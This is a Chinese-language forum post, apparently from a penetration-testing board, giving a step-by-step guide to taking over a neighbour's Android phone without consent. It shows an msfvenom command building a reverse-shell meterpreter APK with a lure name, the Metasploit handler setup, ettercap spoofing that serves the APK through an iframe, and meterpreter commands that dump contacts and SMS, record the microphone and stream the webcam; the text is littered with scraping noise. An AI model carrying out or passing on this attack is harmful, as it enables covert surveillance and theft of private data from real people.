7 c% P. u! F4 }' b& } 五、msf+ettercap入侵邻居安卓手机
首先启动msf ' {1 ?9 m! J" }& r
先用kali生成一个安卓木马,如下命令:
" O9 r; U: e* x fMsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk . A3 x* W9 F5 a* ^) y
9 U7 U6 @$ T- h+ h. x; z
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 / J) b2 G5 E1 m; G/ B* l% y
然后进入msf 5 a" q& J/ ?' K# |; \" d7 y, P
* X3 Z2 `4 u( iuse exploit/multi/handler 8 L& R$ D; }& C$ x/ k r
J1 n* L, i! T set payload android/meterpreter/reverse_tcp
/ d1 D5 {& |# v3 C( t$ Wset LHOST 192.168.0.109 //ip为kaili的ip % E0 S8 m0 L, Z% w3 n
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 ) y3 C3 d5 ^) ]/ _" F8 P! v
/ F9 b: w! \/ S4 u, h) @! _, SExploit : k4 F5 E/ ?% A/ z$ K' r
; l, ^) m, S& I2 R1 D7 }
' m3 B; j& Z: X2 B$ _& U; c5 P
下面我们开启ettercap -G
+ x$ F8 h5 G2 W# d! K 我物理IP为
' n# r# k' [3 B2 B+ ]# o Y 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
3 Z6 A2 D" e4 b ~+ L. b 下面我们来设置一下 % G% g) C& @& u+ v; O
& Z f9 r" w8 n* c; H! ~2 u
6 k2 B, B- |; {+ |3 b
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
: ?8 A I% z8 n& p6 J0 }" }4 B" J' |. |& Z' [ 4 N+ C1 m9 [, Z1 u+ K
7 y: Z/ @9 P- C+ a* K3 W% X. m1 I3 }# A% \+ H& @% L! g( Y/ }3 g& N- b9 t
! O1 _" e" Z7 g {3 h
& S. G, b: B( Q
, {; w% |% }+ a& k, r ) o& Y# r5 ] {* L1 t
0 z* H, }( `4 x; ^+ r2 p
% w" Q) J2 X! j1 Z. b% W; O* ^) c8 G; ~* z: e2 {+ b [ + n3 r4 Y. U s: j+ }) Y8 H+ b
' U. O) l5 T9 ? x
$ X2 }- U# W& }7 e
: D0 N: t8 R3 B! S4 s4 o! J! i
) Y, ^- k1 x: M- R " c6 k1 F. X1 Y' B
, D' x E. Y z; ^
下面我们开始攻击
7 z8 q1 M& ~& V4 I, z6 a+ p& O ~% r, C! R+ K6 K
( V2 u( ], B8 u* s; G
/ w: l$ b( m: M) I% I3 [# C+ @) O1 W# X" {. `
5 S: G) k3 x! L. ]% t$ E# S, W# H. [ m2 R, L : T9 [/ ?0 F k- y
J4 K2 A7 M/ M2 C; a* R 大概过了5分钟多,发现反弹成功了 5 c ] B: _+ d" I+ x2 Z7 e. R
+ W \! `& I' L+ |; o! E, D0 d( ?! V% m( y# ~ ! B2 [! {2 n9 t& E" W
! s) b$ h. I+ ~0 n" k e9 W8 U% q, C' W8 n& h4 x# p # Q- M( n' t2 [( X1 I/ p% ?$ \
) l# Y; z6 I" X1 K- |1 \ & p3 u$ L: ?; O; \: m
8 G" U5 b4 t' w ?1 { e0 i9 W# k1 z
! J+ B4 L5 v3 c; L
8 ^- ]% N: L4 z# x* q
执行命令
& z3 o& L9 ^; h# Z- I7 q- V, e # h8 ^- l w3 J8 l* q' c: p
, X4 E" k. E) A2 G+ X0 ?3 s dump_contacts --》这个是导出电话
dump_sms --》这个是导出信息 ! w! g- J' Z2 Z$ a
3 W X: @3 U7 G& m4 w" b( D2 X% A/ j4 z record_mic Record audio from the default microphone for X seconds t& r. m( f' {3 D$ T
7 j0 n/ p |/ V9 d% V. E4 `/ s5 F2 e }1 R7 ? webcam_chat Start a video chat
z0 n' ]( j$ d) d! p) N, W+ r( H7 i2 Y webcam_list List webcams
$ R: s) x1 h) z. S" Q4 Qwebcam_snap Take a snapshot from the specified webcam 4 W* C: a" z( P, e+ N
T4 J+ A" r: {9 C7 N9 B' a% x% Q' t. r* _) y2 U u. w
webcam_stream  
lay a video stream from the specified webcam
4 M1 Z# E1 m7 ?/ o# u
0 @8 \+ v! H: B
& J; P, d2 }& U( B; ^: i' F7 V, L3 R
* N; U" |1 q/ x' P9 Y
% ^4 Z/ L# H, J( G 我们打开看一下电话薄, 8 b0 B) x- b! O( @% \
( ]/ u; o" b" }$ i6 Q+ n1 v
0 x% o2 b/ l" n $ b2 @; l: s) J+ l" d+ U
- M& I& M( O5 g0 }
, r8 I7 u+ ]/ @' {, W0 J
' U! U0 ~1 T4 o: p% |& i
# M* \ x; ^2 U3 T( x% a0 a( j; B% m: w& k9 m/ [ 我们同时欺骗成DroidJack木马,使用方法如图:
( a) T" q# D4 ]$ w3 i
! O i. B: c6 z4 s
& T# j( _' p" p/ Q; {( h: E
) C6 K7 C7 D4 f4 ^" O' F" z 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
. j' [0 q9 e! E: @/ d% c9 S" A5 u. N0 l. }& s
' ?( [3 c. V9 K5 O; U0 Y
4 W; @/ g# W3 H- @7 i- Z9 k7 ], X+ @. l
) Y) r, C* G' R1 J

| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |